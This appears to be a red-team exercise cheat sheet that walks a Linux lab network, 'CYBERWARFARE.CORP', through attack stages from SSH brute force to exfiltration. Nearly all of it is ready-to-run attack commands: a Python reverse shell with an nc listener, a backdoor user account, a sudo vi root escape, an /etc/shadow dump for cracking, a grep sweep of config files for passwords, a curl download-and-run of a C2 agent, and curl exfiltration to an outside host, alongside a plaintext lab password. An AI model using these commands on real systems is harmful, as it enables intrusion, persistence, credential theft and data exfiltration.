Linux SSH BruteForce
-> SSH with failed login attempt:
ssh emp1@CYBERWARFARE.CORP@10.10.10.6
Password: Wrong_Password
-> SSH with correct login attempt:
ssh emp1@CYBERWARFARE.CORP@10.10.10.6
Password: Serious@963
Execution
-> Attacker Machine:
nc -nlvp 7777
-> On Compromised Machine (Employee-RL1):
[python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.150.3",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Persistence
Add User Account in Linux for persistence:
sudo useradd -p $(openssl passwd -1 password) support_388945a1
Privilege Escalation
Linux Sudo Abuse:
sudo -l
sudo /tmp/vi
Esc + :!/bin/bash
(presented with root)
Defense Evasion
sudo /tmp/vi
Esc + :!/bin/bash
(presented with root)
cd /opt/sensitive
chmod 777 /opt/sensitive
cat read.txt
Credential Access
/etc/shadow & /etc/passwd file dump:
unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
Discovery
Internal Network Service Discovery:
nmap -sC 10.10.10.0/24 --top-ports 5
Lateral Movement
Access Remote machine by abusing Remote Services (SSH): -
ssh –D 9999 emp1@CYBERWARFARE.CORP@10.10.10.3
Pass: Serious@963
Data Collection
Data from Local System-
find / -maxdepth 4 -name '*.conf' -type f -exec grep -Hn 'pass\|password\|login\|username\|email\|mail\|host\|ip' {} \; 2>/dev/null
Command & Control
Caldera C2 server Network Communication:
server="http://192.168.250.12:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go;chmod +x sandcat.go;./sandcat.go -server $server -group red -v
Data Exfiltration
Exfiltration over Alternative Protocol (HTTP): -
curl –d ‘data=sensitivedata’ http://192.168.250.12:8888/data
Multiple Techniques:
https://github.com/FortyNorthSecurity/Egress-Assess
Server: ./Egress-Assess.py --server https --username testuser --password pass123
Client: Invoke-EgressAssess -client https -IP -UserName testuser -Password pass123 -Datatype ssn
https://github.com/ytisf/PyExfil
